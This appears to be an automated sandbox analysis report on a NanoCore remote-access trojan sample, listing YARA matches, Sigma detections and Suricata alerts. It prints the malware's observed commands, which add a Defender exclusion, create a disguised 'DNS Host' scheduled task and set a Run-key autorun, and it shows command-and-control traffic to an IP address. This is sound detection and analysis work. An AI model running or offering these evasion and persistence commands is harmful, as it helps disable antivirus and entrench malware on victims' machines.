5.2.nD2ozRD7MN.exe.3456430.2.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x142b:$a: NanoCore 0x1484:$a: NanoCore 0x14b7:$a: NanoCore 0x16e3:$a: NanoCore 0x175f:$a: NanoCore 0x1d78:$a: NanoCore 0x1ec1:$a: NanoCore 0x2395:$a: NanoCore 0x267c:$a: NanoCore 0x2693:$a: NanoCore 0xb537:$a: NanoCore 0xb5b3:$a: NanoCore 0xde96:$a: NanoCore 0x12608:$a: NanoCore 0x12652:$a: NanoCore 0x132ac:$a: NanoCore 0x18895:$a: NanoCore 0x1890f:$a: NanoCore 0x22ea7:$a: NanoCore 0x22f91:$a: NanoCore 0x23e08:$a: NanoCore
5.2.nD2ozRD7MN.exe.3456430.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x16e3:$x1: NanoCore.ClientPluginHost 0xb537:$x1: NanoCore.ClientPluginHost 0x12608:$x1: NanoCore.ClientPluginHost 0x18895:$x1: NanoCore.ClientPluginHost 0x22ea7:$x1: NanoCore.ClientPluginHost 0x2d2d7:$x1: NanoCore.ClientPluginHost 0x382bd:$x1: NanoCore.ClientPluginHost 0x44067:$x1: NanoCore.ClientPluginHost 0x4fdb2:$x1: NanoCore.ClientPluginHost 0x171c:$x2: IClientNetworkHost 0xb570:$x2: IClientNetworkHost 0x188ce:$x2: IClientNetworkHost 0x23004:$x2: IClientNetworkHost 0x2d310:$x2: IClientNetworkHost 0x382d7:$x2: IClientNetworkHost 0x44081:$x2: IClientNetworkHost 0x4fdef:$x2: IClientNetworkHost
5.2.nD2ozRD7MN.exe.3456430.2.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x175f:$x2: NanoCore.ClientPlugin 0xb5b3:$x2: NanoCore.ClientPlugin 0x12652:$x2: NanoCore.ClientPlugin 0x1890f:$x2: NanoCore.ClientPlugin 0x22f91:$x2: NanoCore.ClientPlugin 0x2d377:$x2: NanoCore.ClientPlugin 0x38294:$x2: NanoCore.ClientPlugin 0x4403e:$x2: NanoCore.ClientPlugin 0x4fd8d:$x2: NanoCore.ClientPlugin 0x16e3:$x3: NanoCore.ClientPluginHost 0xb537:$x3: NanoCore.ClientPluginHost 0x12608:$x3: NanoCore.ClientPluginHost 0x18895:$x3: NanoCore.ClientPluginHost 0x22ea7:$x3: NanoCore.ClientPluginHost 0x2d2d7:$x3: NanoCore.ClientPluginHost 0x382bd:$x3: NanoCore.ClientPluginHost 0x44067:$x3: NanoCore.ClientPluginHost 0x4fdb2:$x3: NanoCore.ClientPluginHost 0x1775:$i3: IClientNetwork 0xb5c9:$i3: IClientNetwork 0x12668:$i3: IClientNetwork
0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xf91cd:$a1: NanoCore.ClientPluginHost 0x12bbed:$a1: NanoCore.ClientPluginHost 0xf918d:$a2: NanoCore.ClientPlugin 0x12bbad:$a2: NanoCore.ClientPlugin 0xfb0e6:$b1: get_BuilderSettings 0x12db06:$b1: get_BuilderSettings 0xf8fe9:$b2: ClientLoaderForm.resources 0x12ba09:$b2: ClientLoaderForm.resources 0xfa806:$b3: PluginCommand 0x12d226:$b3: PluginCommand 0xf91be:$b4: IClientAppHost 0x12bbde:$b4: IClientAppHost 0x10363e:$b5: GetBlockHash 0x13605e:$b5: GetBlockHash 0xfb73e:$b6: AddHostEntry 0x12e15e:$b6: AddHostEntry 0xff431:$b7: LogClientException 0x131e51:$b7: LogClientException 0xfb6ab:$b8: PipeExists 0x12e0cb:$b8: PipeExists 0xf91f7:$b9: IClientLoggingHost
0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xf8f35:$a: NanoCore 0xf8f45:$a: NanoCore 0xf9179:$a: NanoCore 0xf918d:$a: NanoCore 0xf91cd:$a: NanoCore 0x12b955:$a: NanoCore 0x12b965:$a: NanoCore 0x12bb99:$a: NanoCore 0x12bbad:$a: NanoCore 0x12bbed:$a: NanoCore 0xf8f94:$b: ClientPlugin 0xf9196:$b: ClientPlugin 0xf91d6:$b: ClientPlugin 0x12b9b4:$b: ClientPlugin 0x12bbb6:$b: ClientPlugin 0x12bbf6:$b: ClientPlugin 0x33bca:$c: ProjectData 0xa83ea:$c: ProjectData 0xf90bb:$c: ProjectData 0x12badb:$c: ProjectData 0xf9ac2:$d: DESCrypto
0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf91cd:$x1: NanoCore.ClientPluginHost 0x12bbed:$x1: NanoCore.ClientPluginHost 0xf920a:$x2: IClientNetworkHost 0x12bc2a:$x2: IClientNetworkHost 0xfcd3d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x12f75d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack	Nanocore	detect Nanocore in memory	JPCERT/CC Incident Response Group	0xf8f35:$v1: NanoCore Client 0xf8f45:$v1: NanoCore Client 0x12b955:$v1: NanoCore Client 0x12b965:$v1: NanoCore Client 0xfa806:$v2: PluginCommand 0x12d226:$v2: PluginCommand 0xfa7ee:$v3: CommandType 0x12d20e:$v3: CommandType
12.2.nD2ozRD7MN.exe.3c8061c.3.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xf7ad:$a1: NanoCore.ClientPluginHost 0x28791:$a1: NanoCore.ClientPluginHost 0xf778:$a2: NanoCore.ClientPlugin 0x2875c:$a2: NanoCore.ClientPlugin 0x146f3:$b1: get_BuilderSettings 0x2d6d7:$b1: get_BuilderSettings 0x14662:$b7: LogClientException 0x2d646:$b7: LogClientException 0xf7c7:$b9: IClientLoggingHost 0x287ab:$b9: IClientLoggingHost
5.2.nD2ozRD7MN.exe.473fe5e.4.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x5b70:$x2: NanoCore.ClientPlugin 0x11912:$x2: NanoCore.ClientPlugin 0x36816:$x2: NanoCore.ClientPlugin 0x45c5a:$x2: NanoCore.ClientPlugin 0x5b99:$x3: NanoCore.ClientPluginHost 0x1193b:$x3: NanoCore.ClientPluginHost 0x3683f:$x3: NanoCore.ClientPluginHost 0x45c7f:$x3: NanoCore.ClientPluginHost 0x5b61:$i3: IClientNetwork 0x11903:$i3: IClientNetwork 0x36807:$i3: IClientNetwork 0x45c4b:$i3: IClientNetwork 0x45c70:$i4: IClientAppHost 0x45c99:$i5: IClientDataHost 0x5b86:$i6: IClientLoggingHost 0x11928:$i6: IClientLoggingHost 0x3682c:$i6: IClientLoggingHost 0x45ca9:$i6: IClientLoggingHost 0x5bb3:$i7: IClientNetworkHost 0x11955:$i7: IClientNetworkHost 0x36859:$i7: IClientNetworkHost
5.2.nD2ozRD7MN.exe.45f36dc.6.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x10937:$a1: NanoCore.ClientPluginHost 0x1090e:$a2: NanoCore.ClientPlugin 0x15962:$b7: LogClientException 0x10924:$b9: IClientLoggingHost
5.2.nD2ozRD7MN.exe.473702f.9.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x39eb:$a1: NanoCore.ClientPluginHost 0xe9c8:$a1: NanoCore.ClientPluginHost 0x1a76a:$a1: NanoCore.ClientPluginHost 0x3f66e:$a1: NanoCore.ClientPluginHost 0x4eaae:$a1: NanoCore.ClientPluginHost 0x3a8b:$a2: NanoCore.ClientPlugin 0xe99f:$a2: NanoCore.ClientPlugin 0x1a741:$a2: NanoCore.ClientPlugin 0x3f645:$a2: NanoCore.ClientPlugin 0x4ea89:$a2: NanoCore.ClientPlugin 0x4ea9f:$b4: IClientAppHost 0x47e1:$b7: LogClientException 0x1cab3:$b7: LogClientException 0x44699:$b7: LogClientException 0x52f8e:$b7: LogClientException 0x3a05:$b9: IClientLoggingHost 0xe9b5:$b9: IClientLoggingHost 0x1a757:$b9: IClientLoggingHost 0x3f65b:$b9: IClientLoggingHost 0x4ead8:$b9: IClientLoggingHost
5.2.nD2ozRD7MN.exe.45f36dc.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x10937:$x1: NanoCore.ClientPluginHost 0x10951:$x2: IClientNetworkHost
5.2.nD2ozRD7MN.exe.3441e00.3.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x8ba5:$a1: NanoCore.ClientPluginHost 0x15d13:$a1: NanoCore.ClientPluginHost 0x1fb67:$a1: NanoCore.ClientPluginHost 0x26c38:$a1: NanoCore.ClientPluginHost 0x2cec5:$a1: NanoCore.ClientPluginHost 0x374d7:$a1: NanoCore.ClientPluginHost 0x41907:$a1: NanoCore.ClientPluginHost 0x4c8ed:$a1: NanoCore.ClientPluginHost 0x58697:$a1: NanoCore.ClientPluginHost 0x643e2:$a1: NanoCore.ClientPluginHost 0x8b7f:$a2: NanoCore.ClientPlugin 0x15d8f:$a2: NanoCore.ClientPlugin 0x1fbe3:$a2: NanoCore.ClientPlugin 0x26c82:$a2: NanoCore.ClientPlugin 0x2cf3f:$a2: NanoCore.ClientPlugin 0x375c1:$a2: NanoCore.ClientPlugin 0x419a7:$a2: NanoCore.ClientPlugin 0x4c8c4:$a2: NanoCore.ClientPlugin 0x5866e:$a2: NanoCore.ClientPlugin 0x643bd:$a2: NanoCore.ClientPlugin 0x643d3:$b4: IClientAppHost
0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xf8f35:$x1: NanoCore Client 0xf8f45:$x1: NanoCore Client 0x12b955:$x1: NanoCore Client 0x12b965:$x1: NanoCore Client 0xf918d:$x2: NanoCore.ClientPlugin 0x12bbad:$x2: NanoCore.ClientPlugin 0xf91cd:$x3: NanoCore.ClientPluginHost 0x12bbed:$x3: NanoCore.ClientPluginHost 0xf9182:$i1: IClientApp 0x12bba2:$i1: IClientApp 0xf91a3:$i2: IClientData 0x12bbc3:$i2: IClientData 0xf91af:$i3: IClientNetwork 0x12bbcf:$i3: IClientNetwork 0xf91be:$i4: IClientAppHost 0x12bbde:$i4: IClientAppHost 0xf91e7:$i5: IClientDataHost 0x12bc07:$i5: IClientDataHost 0xf91f7:$i6: IClientLoggingHost 0x12bc17:$i6: IClientLoggingHost 0xf920a:$i7: IClientNetworkHost
5.2.nD2ozRD7MN.exe.45f36dc.6.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x1090e:$x2: NanoCore.ClientPlugin 0x10937:$x3: NanoCore.ClientPluginHost 0x108ff:$i3: IClientNetwork 0x10924:$i6: IClientLoggingHost 0x10951:$i7: IClientNetworkHost 0x10964:$i8: IClientUIHost 0x1066e:$s1: ClientPlugin 0x10917:$s1: ClientPlugin
0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.nD2ozRD7MN.exe.473702f.9.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x36cb:$a: NanoCore 0x372c:$a: NanoCore 0x376f:$a: NanoCore 0x37af:$a: NanoCore 0x39eb:$a: NanoCore 0x3a8b:$a: NanoCore 0x4263:$a: NanoCore 0x4856:$a: NanoCore 0x49a7:$a: NanoCore 0x5801:$a: NanoCore 0x5a68:$a: NanoCore 0x5a7d:$a: NanoCore 0x5a9c:$a: NanoCore 0xe99f:$a: NanoCore 0xe9c8:$a: NanoCore 0x1a741:$a: NanoCore 0x1a76a:$a: NanoCore 0x3f62d:$a: NanoCore 0x3f645:$a: NanoCore 0x3f66e:$a: NanoCore 0x4ea71:$a: NanoCore
5.2.nD2ozRD7MN.exe.473702f.9.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x39eb:$x1: NanoCore.ClientPluginHost 0xe9c8:$x1: NanoCore.ClientPluginHost 0x1a76a:$x1: NanoCore.ClientPluginHost 0x3f66e:$x1: NanoCore.ClientPluginHost 0x4eaae:$x1: NanoCore.ClientPluginHost 0x3a24:$x2: IClientNetworkHost 0xe9e2:$x2: IClientNetworkHost 0x1a784:$x2: IClientNetworkHost 0x3f688:$x2: IClientNetworkHost 0x4eaeb:$x2: IClientNetworkHost
12.2.nD2ozRD7MN.exe.3c8061c.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0x28791:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost 0x287be:$x2: IClientNetworkHost
12.2.nD2ozRD7MN.exe.3c8061c.3.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xf778:$x2: NanoCore.ClientPlugin 0x2875c:$x2: NanoCore.ClientPlugin 0xf7ad:$x3: NanoCore.ClientPluginHost 0x28791:$x3: NanoCore.ClientPluginHost 0xf76c:$i2: IClientData 0x28750:$i2: IClientData 0xf78e:$i3: IClientNetwork 0x28772:$i3: IClientNetwork 0xf79d:$i5: IClientDataHost 0x28781:$i5: IClientDataHost 0xf7c7:$i6: IClientLoggingHost 0x287ab:$i6: IClientLoggingHost 0xf7da:$i7: IClientNetworkHost 0x287be:$i7: IClientNetworkHost 0xf7ed:$i8: IClientUIHost 0x287d1:$i8: IClientUIHost 0xf7fb:$i9: IClientNameObjectCollection 0x287df:$i9: IClientNameObjectCollection 0xf817:$i10: IClientReadOnlyNameObjectCollection 0x287fb:$i10: IClientReadOnlyNameObjectCollection 0xf56a:$s1: ClientPlugin
0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x849ad:$a1: NanoCore.ClientPluginHost 0xb73cd:$a1: NanoCore.ClientPluginHost 0x8496d:$a2: NanoCore.ClientPlugin 0xb738d:$a2: NanoCore.ClientPlugin 0x868c6:$b1: get_BuilderSettings 0xb92e6:$b1: get_BuilderSettings 0x847c9:$b2: ClientLoaderForm.resources 0xb71e9:$b2: ClientLoaderForm.resources 0x85fe6:$b3: PluginCommand 0xb8a06:$b3: PluginCommand 0x8499e:$b4: IClientAppHost 0xb73be:$b4: IClientAppHost 0x8ee1e:$b5: GetBlockHash 0xc183e:$b5: GetBlockHash 0x86f1e:$b6: AddHostEntry 0xb993e:$b6: AddHostEntry 0x8ac11:$b7: LogClientException 0xbd631:$b7: LogClientException 0x86e8b:$b8: PipeExists 0xb98ab:$b8: PipeExists 0x849d7:$b9: IClientLoggingHost
5.2.nD2ozRD7MN.exe.473702f.9.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x3a8b:$x2: NanoCore.ClientPlugin 0xe99f:$x2: NanoCore.ClientPlugin 0x1a741:$x2: NanoCore.ClientPlugin 0x3f645:$x2: NanoCore.ClientPlugin 0x4ea89:$x2: NanoCore.ClientPlugin 0x39eb:$x3: NanoCore.ClientPluginHost 0xe9c8:$x3: NanoCore.ClientPluginHost 0x1a76a:$x3: NanoCore.ClientPluginHost 0x3f66e:$x3: NanoCore.ClientPluginHost 0x4eaae:$x3: NanoCore.ClientPluginHost 0x3aa1:$i3: IClientNetwork 0xe990:$i3: IClientNetwork 0x1a732:$i3: IClientNetwork 0x3f636:$i3: IClientNetwork 0x4ea7a:$i3: IClientNetwork 0x4ea9f:$i4: IClientAppHost 0x3a43:$i5: IClientDataHost 0x4eac8:$i5: IClientDataHost 0x3a05:$i6: IClientLoggingHost 0xe9b5:$i6: IClientLoggingHost 0x1a757:$i6: IClientLoggingHost
5.2.nD2ozRD7MN.exe.3441e00.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x8b7f:$a: NanoCore 0x8ba5:$a: NanoCore 0x8c01:$a: NanoCore 0x15a5b:$a: NanoCore 0x15ab4:$a: NanoCore 0x15ae7:$a: NanoCore 0x15d13:$a: NanoCore 0x15d8f:$a: NanoCore 0x163a8:$a: NanoCore 0x164f1:$a: NanoCore 0x169c5:$a: NanoCore 0x16cac:$a: NanoCore 0x16cc3:$a: NanoCore 0x1fb67:$a: NanoCore 0x1fbe3:$a: NanoCore 0x224c6:$a: NanoCore 0x26c38:$a: NanoCore 0x26c82:$a: NanoCore 0x278dc:$a: NanoCore 0x2cec5:$a: NanoCore 0x2cf3f:$a: NanoCore
5.2.nD2ozRD7MN.exe.3441e00.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x8ba5:$x1: NanoCore.ClientPluginHost 0x15d13:$x1: NanoCore.ClientPluginHost 0x1fb67:$x1: NanoCore.ClientPluginHost 0x26c38:$x1: NanoCore.ClientPluginHost 0x2cec5:$x1: NanoCore.ClientPluginHost 0x374d7:$x1: NanoCore.ClientPluginHost 0x41907:$x1: NanoCore.ClientPluginHost 0x4c8ed:$x1: NanoCore.ClientPluginHost 0x58697:$x1: NanoCore.ClientPluginHost 0x643e2:$x1: NanoCore.ClientPluginHost 0x8bd2:$x2: IClientNetworkHost 0x15d4c:$x2: IClientNetworkHost 0x1fba0:$x2: IClientNetworkHost 0x2cefe:$x2: IClientNetworkHost 0x37634:$x2: IClientNetworkHost 0x41940:$x2: IClientNetworkHost 0x4c907:$x2: IClientNetworkHost 0x586b1:$x2: IClientNetworkHost 0x6441f:$x2: IClientNetworkHost
0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x84715:$a: NanoCore 0x84725:$a: NanoCore 0x84959:$a: NanoCore 0x8496d:$a: NanoCore 0x849ad:$a: NanoCore 0xb7135:$a: NanoCore 0xb7145:$a: NanoCore 0xb7379:$a: NanoCore 0xb738d:$a: NanoCore 0xb73cd:$a: NanoCore 0x84774:$b: ClientPlugin 0x84976:$b: ClientPlugin 0x849b6:$b: ClientPlugin 0xb7194:$b: ClientPlugin 0xb7396:$b: ClientPlugin 0xb73d6:$b: ClientPlugin 0x33bca:$c: ProjectData 0x8489b:$c: ProjectData 0xb72bb:$c: ProjectData 0x852a2:$d: DESCrypto 0xb7cc2:$d: DESCrypto
0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x849ad:$x1: NanoCore.ClientPluginHost 0xb73cd:$x1: NanoCore.ClientPluginHost 0x849ea:$x2: IClientNetworkHost 0xb740a:$x2: IClientNetworkHost 0x8851d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xbaf3d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
5.2.nD2ozRD7MN.exe.3441e00.3.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x8b7f:$x2: NanoCore.ClientPlugin 0x15d8f:$x2: NanoCore.ClientPlugin 0x1fbe3:$x2: NanoCore.ClientPlugin 0x26c82:$x2: NanoCore.ClientPlugin 0x2cf3f:$x2: NanoCore.ClientPlugin 0x375c1:$x2: NanoCore.ClientPlugin 0x419a7:$x2: NanoCore.ClientPlugin 0x4c8c4:$x2: NanoCore.ClientPlugin 0x5866e:$x2: NanoCore.ClientPlugin 0x643bd:$x2: NanoCore.ClientPlugin 0x8ba5:$x3: NanoCore.ClientPluginHost 0x15d13:$x3: NanoCore.ClientPluginHost 0x1fb67:$x3: NanoCore.ClientPluginHost 0x26c38:$x3: NanoCore.ClientPluginHost 0x2cec5:$x3: NanoCore.ClientPluginHost 0x374d7:$x3: NanoCore.ClientPluginHost 0x41907:$x3: NanoCore.ClientPluginHost 0x4c8ed:$x3: NanoCore.ClientPluginHost 0x58697:$x3: NanoCore.ClientPluginHost 0x643e2:$x3: NanoCore.ClientPluginHost 0x8b70:$i3: IClientNetwork
0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack	Nanocore	detect Nanocore in memory	JPCERT/CC Incident Response Group	0x84715:$v1: NanoCore Client 0x84725:$v1: NanoCore Client 0xb7135:$v1: NanoCore Client 0xb7145:$v1: NanoCore Client 0x85fe6:$v2: PluginCommand 0xb8a06:$v2: PluginCommand 0x85fce:$v3: CommandType 0xb89ee:$v3: CommandType
0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x84715:$x1: NanoCore Client 0x84725:$x1: NanoCore Client 0xb7135:$x1: NanoCore Client 0xb7145:$x1: NanoCore Client 0x8496d:$x2: NanoCore.ClientPlugin 0xb738d:$x2: NanoCore.ClientPlugin 0x849ad:$x3: NanoCore.ClientPluginHost 0xb73cd:$x3: NanoCore.ClientPluginHost 0x84962:$i1: IClientApp 0xb7382:$i1: IClientApp 0x84983:$i2: IClientData 0xb73a3:$i2: IClientData 0x8498f:$i3: IClientNetwork 0xb73af:$i3: IClientNetwork 0x8499e:$i4: IClientAppHost 0xb73be:$i4: IClientAppHost 0x849c7:$i5: IClientDataHost 0xb73e7:$i5: IClientDataHost 0x849d7:$i6: IClientLoggingHost 0xb73f7:$i6: IClientLoggingHost 0x849ea:$i7: IClientNetworkHost
Click to see the 223 entries

Sigma Signatures

AV Detection

Sigma detected: NanoCore

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\nD2ozRD7MN.exe, ProcessId: 5016, TargetFilename: C:\Users\user\AppData\Roaming\9E146BE9-C76A-4720-BCDB-53011B87BD06\run.dat

E-Banking Fraud

Sigma detected: NanoCore

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\nD2ozRD7MN.exe, ProcessId: 5016, TargetFilename: C:\Users\user\AppData\Roaming\9E146BE9-C76A-4720-BCDB-53011B87BD06\run.dat

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nD2ozRD7MN.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nD2ozRD7MN.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\nD2ozRD7MN.exe", ParentImage: C:\Users\user\Desktop\nD2ozRD7MN.exe, ParentProcessId: 1892, ParentProcessName: nD2ozRD7MN.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nD2ozRD7MN.exe", ProcessId: 4164, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /f /tn "DNS Host" /xml "C:\Users\user\AppData\Local\Temp\tmpC5F1.tmp", CommandLine: "schtasks.exe" /create /f /tn "DNS Host" /xml "C:\Users\user\AppData\Local\Temp\tmpC5F1.tmp", CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\nD2ozRD7MN.exe", ParentImage: C:\Users\user\Desktop\nD2ozRD7MN.exe, ParentProcessId: 5016, ParentProcessName: nD2ozRD7MN.exe, ProcessCommandLine: "schtasks.exe" /create /f /tn "DNS Host" /xml "C:\Users\user\AppData\Local\Temp\tmpC5F1.tmp", ProcessId: 7228, ProcessName: schtasks.exe

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Program Files (x86)\DNS Host\dnshost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\nD2ozRD7MN.exe, ProcessId: 5016, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\DNS Host

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nD2ozRD7MN.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nD2ozRD7MN.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\nD2ozRD7MN.exe", ParentImage: C:\Users\user\Desktop\nD2ozRD7MN.exe, ParentProcessId: 1892, ParentProcessName: nD2ozRD7MN.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nD2ozRD7MN.exe", ProcessId: 4164, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "schtasks.exe" /create /f /tn "DNS Host" /xml "C:\Users\user\AppData\Local\Temp\tmpC5F1.tmp", CommandLine: "schtasks.exe" /create /f /tn "DNS Host" /xml "C:\Users\user\AppData\Local\Temp\tmpC5F1.tmp", CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\nD2ozRD7MN.exe", ParentImage: C:\Users\user\Desktop\nD2ozRD7MN.exe, ParentProcessId: 5016, ParentProcessName: nD2ozRD7MN.exe, ProcessCommandLine: "schtasks.exe" /create /f /tn "DNS Host" /xml "C:\Users\user\AppData\Local\Temp\tmpC5F1.tmp", ProcessId: 7228, ProcessName: schtasks.exe

Stealing of Sensitive Information

Sigma detected: NanoCore

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\nD2ozRD7MN.exe, ProcessId: 5016, TargetFilename: C:\Users\user\AppData\Roaming\9E146BE9-C76A-4720-BCDB-53011B87BD06\run.dat

Remote Access Functionality

Sigma detected: NanoCore

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\nD2ozRD7MN.exe, ProcessId: 5016, TargetFilename: C:\Users\user\AppData\Roaming\9E146BE9-C76A-4720-BCDB-53011B87BD06\run.dat

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T06:19:13.634947+0100	2022930	1	A Network Trojan was detected	4.245.163.56	443	192.168.2.5	49711	TCP
2024-11-01T06:19:52.289721+0100	2022930	1	A Network Trojan was detected	4.245.163.56	443	192.168.2.5	49907	TCP

ET MALWARE NanoCore RAT CnC 7

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T06:18:58.936669+0100	2046914	1	Malware Command and Control Activity Detected	192.168.2.5	49707	66.63.187.113	1664	TCP
2024-11-01T06:19:00.089903+0100	2046914	1	Malware Command and Control Activity Detected	192.168.2.5	49707	66.63.187.113	1664	TCP
2024-11-01T06:19:06.283817+0100	2046914	1	Malware Command and Control Activity Detected	192.168.2.5	49710	66.63.187.113	1664	TCP
2024-11-01T06:19:07.281024+0100	2046914	1	Malware Command and Control Activity Detected	192.168.2.5	49710	66.63.187.113	1664	TCP
2024-11-01T06:19:12.333818+0100	2046914	1	Malware Command and Control Activity Detected	192.168.2.5	49713	66.63.187.113	1664	TCP
2024-11-01T06:19:13.326855+0100	2046914	1	Malware Command and Control Activity Detected	192.168.2.5	49713	66.63.187.113	1664	TCP
2024-11-01T06:19:19.326895+0100	2046914	1	Malware Command and Control Activity Detected	192.168.2.5	49729	66.63.187.113	1664	TCP
2024-11-01T06:19:24.373797+0100	2046914	1	Malware Command and Control Activity Detected	192.168.2.5	49760	66.63.187.113	1664	TCP
2024-11-01T06:19:25.373809+0100	2046914	1	Malware Command and Control Activity Detected	192.168.2.5	49760	66.63.187.113	1664	TCP
2024-11-01T06:19:30.477669+0100	2046914	1	Malware Command and Control Activity Detected	192.168.2.5	49794	66.63.187.113	1664	TCP
2024-11-01T06:19:31.467571+0100	2046914	1	Malware Command and Control Activity Detected	192.168.2.5	49794	66.63.187.113	1664	TCP
